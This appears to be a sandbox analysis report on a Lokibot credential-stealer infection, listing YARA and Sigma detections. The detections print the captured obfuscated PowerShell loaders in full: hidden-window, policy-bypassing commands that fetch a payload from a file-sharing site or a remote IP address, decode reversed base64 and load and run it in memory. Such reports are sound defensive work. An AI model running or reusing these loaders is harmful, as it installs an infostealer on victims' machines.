9.2.powershell.exe.660c250.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
9.2.powershell.exe.660c250.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
9.2.powershell.exe.660c250.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
9.2.powershell.exe.660c250.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
9.2.powershell.exe.660c250.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
11.2.aspnet_compiler.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
11.2.aspnet_compiler.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
11.2.aspnet_compiler.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.aspnet_compiler.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
11.2.aspnet_compiler.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
11.2.aspnet_compiler.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
11.2.aspnet_compiler.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
11.2.aspnet_compiler.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
Click to see the 24 entries

Other

Source	Rule	Description	Author	Strings
amsi32_5536.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHZFckJPU2VQUkVmRVJlbkNlLlRPc3RyaW5nKClbMSwzXSsneCctSm9JbicnKSAoKCdwd2dpbWFnZVVybCcrJyAnKyc9IG9UQWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiJysnMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2VCeXRlcyA9IHB3Z3dlYkNsaWVudC5Eb3dubCcrJ29hZERhdGEocHdnaW1hZ2VVcmwpO3B3Z2ltYWdlVGV4dCA9IFtTeXN0ZW0uVCcrJ2V4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHB3Z2ltYWdlQnl0ZXMpO3B3Z3N0YXJ0RmxhZyA9IG9UQTw8QkFTRTY0XycrJ1NUQVJUPj5vVEE7cHdnZW5kRmxhZyA9IG9UQTw8QkFTRTY0X0VORD4+b1RBO3B3Z3N0YXJ0SW5kZXggPSBwd2dpbWFnZVRleHQuSW5kZXhPZihwd2dzdGFydEZsYWcpO3B3Z2VuZEluZGV4ID0gcHdnaW1hZ2VUZXh0LkluZGV4JysnT2YocHdnZW5kRmxhZyk7cHdnJysnc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHB3Z2VuZEluZGV4IC1ndCBwd2dzdGFydEluZGV4O3B3Z3N0YXJ0SW5kZXggKz0gcHdnc3RhcnRGbGFnLkxlbmd0aDtwd2diYXNlNjRMZW5ndGggPSBwd2dlbmRJbmRleCAtIHB3Z3N0YXJ0SW5kZXg7cHdnYmFzZTY0Q29tbWFuZCcrJyA9IHB3Z2ltYWdlVGV4dC5TdWJzdHJpbmcocHdnc3RhcnRJbmRleCwgcHdnYmFzZTY0TGVuZ3RoKTtwd2diYXNlNjRSZXZlcnNlZCA9IC1qb2luIChwd2diYXNlNjRDb21tYW5kLlRvJysnQ2hhckFycmF5KCkgNG91IEZvckVhY2gtT2JqZWN0IHsgcHdnXyB9KVstMS4uLShwd2diYXNlNjRDb21tYW5kLkxlbmd0aCldO3B3Z2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcocHdnYmFzZTY0UmV2ZXJzZWQpO3B3Z2xvYWRlZEFzc2VtYmwnKyd5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChwd2djb21tYW5kQnl0ZXMpO3B3Z3ZhaU1ldGhvZCA9IFtkbicrJ2xpYi5JTy5Ib21lXS5HJysnZXRNZXRob2Qob1RBVkFJb1RBKTtwd2d2YWknKydNZXRob2QuSW52b2tlKHB3JysnZ251bGwsIEAob1RBdHh0LlNMTFBNUy8yMy82MzEuMzQyLjMuMjkxLy86cHR0aG9UQSwgb1RBZGVzYXRpdmFkb29UQSwnKycgb1RBZGVzJysnYXRpdmFkb29UQSwgb1RBZGVzYXQnKydpdmFkb29UQSwgb1RBYXNwbmV0X2NvbXBpbGVyb1RBLCBvVEFkJysnZXNhdGl2YWRvb1RBLCBvVEFkZXNhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpdmFkJysnb29UQSxvVEFkZScrJ3NhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpJysndmFkb29UQSxvVCcrJ0Exb1RBLG9UJysnQWRlc2F0aXZhZG9vVEEpKTsnKS5SZXBMQWNlKCdwd2cnLFtTVHJJbmddW0NoQXJdMzYpLlJlcExBY2UoKFtDaEFyXTExMStbQ2hBcl04NCtbQ2hBcl02NSksW1NUckluZ11bQ2hBcl0zOSkuUmVwTEFjZSgoW0NoQXJdNTIrW0NoQXJdMTExK1tDaEFyXTExNyksJ3wnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHZFckJPU2VQUkVmRVJlbkNlLlRPc3RyaW5nKClbMSwzXSsneCctSm9JbicnKSAoKCdwd2dpbWFnZVVybCcrJyAnKyc9IG9UQWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiJysnMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2VCeXRlcyA9IHB3Z3dlYkNsaWVudC5Eb3dubCcrJ29hZERhdGEocHdnaW1hZ2VVcmwpO3B3Z2ltYWdlVGV4dCA9IFtT

Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation

Source: Process started

Author: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.Home].G'+'etMethod(oTAVAIoTA);pwgvai'+'Method.Invoke(pw'+'gnull, @(oTAtxt.SLLPMS/23/631.342.3.291//:ptthoTA, oTAdesativadooTA,'+' oTAdes'+'ativadooTA, oTAdesat'+'ivadooTA, oTAaspnet_compileroTA, oTAd'+'esativadooTA, oTAdesativadooTA,oTAdesativadooTA,oTAdesativad'+'ooTA,oTAde'+'sativadooTA,oTAdesativadooTA,oTAdesati'+'vadooTA,oT'+'A1oTA,oT'+'AdesativadooTA));').RepLAce('pwg',[STrIng][ChAr]36).RepLAce(([ChAr]111+[ChAr]84+[ChAr]65),[STrIng][ChAr]39).RepLAce(([ChAr]52+[ChAr]111+[ChAr]117),'|'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.

Sigma detected: Potential PowerShell Command Line Obfuscation

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.Home].G'+'etMethod(oTAVAIoTA);pwgvai'+'Method.Invoke(pw'+'gnull, @(oTAtxt.SLLPMS/23/631.342.3.291//:ptthoTA, oTAdesativadooTA,'+' oTAdes'+'ativadooTA, oTAdesat'+'ivadooTA, oTAaspnet_compileroTA, oTAd'+'esativadooTA, oTAdesativadooTA,oTAdesativadooTA,oTAdesativad'+'ooTA,oTAde'+'sativadooTA,oTAdesativadooTA,oTAdesati'+'vadooTA,oT'+'A1oTA,oT'+'AdesativadooTA));').RepLAce('pwg',[STrIng][ChAr]36).RepLAce(([ChAr]111+[ChAr]84+[ChAr]65),[STrIng][ChAr]39).RepLAce(([ChAr]52+[ChAr]111+[ChAr]117),'|'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.Home].G'+'etMethod(oTAVAIoTA);pwgvai'+'Method.Invoke(pw'+'gnull, @(oTAtxt.SLLPMS/23/631.342.3.291//:ptthoTA, oTAdesativadooTA,'+' oTAdes'+'ativadooTA, oTAdesat'+'ivadooTA, oTAaspnet_compileroTA, oTAd'+'esativadooTA, oTAdesativadooTA,oTAdesativadooTA,oTAdesativad'+'ooTA,oTAde'+'sativadooTA,oTAdesativadooTA,oTAdesati'+'vadooTA,oT'+'A1oTA,oT'+'AdesativadooTA));').RepLAce('pwg',[STrIng][ChAr]36).RepLAce(([ChAr]111+[ChAr]84+[ChAr]65),[STrIng][ChAr]39).RepLAce(([ChAr]52+[ChAr]111+[ChAr]117),'|'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswithentirelifetimethingstodomyb.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswithentirelifetimethingstodomyb.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3160, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswithentirelifetimethingstodomyb.vbS" , ProcessId: 5560, ProcessName: wscript.exe

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))", CommandLine: "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICA

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

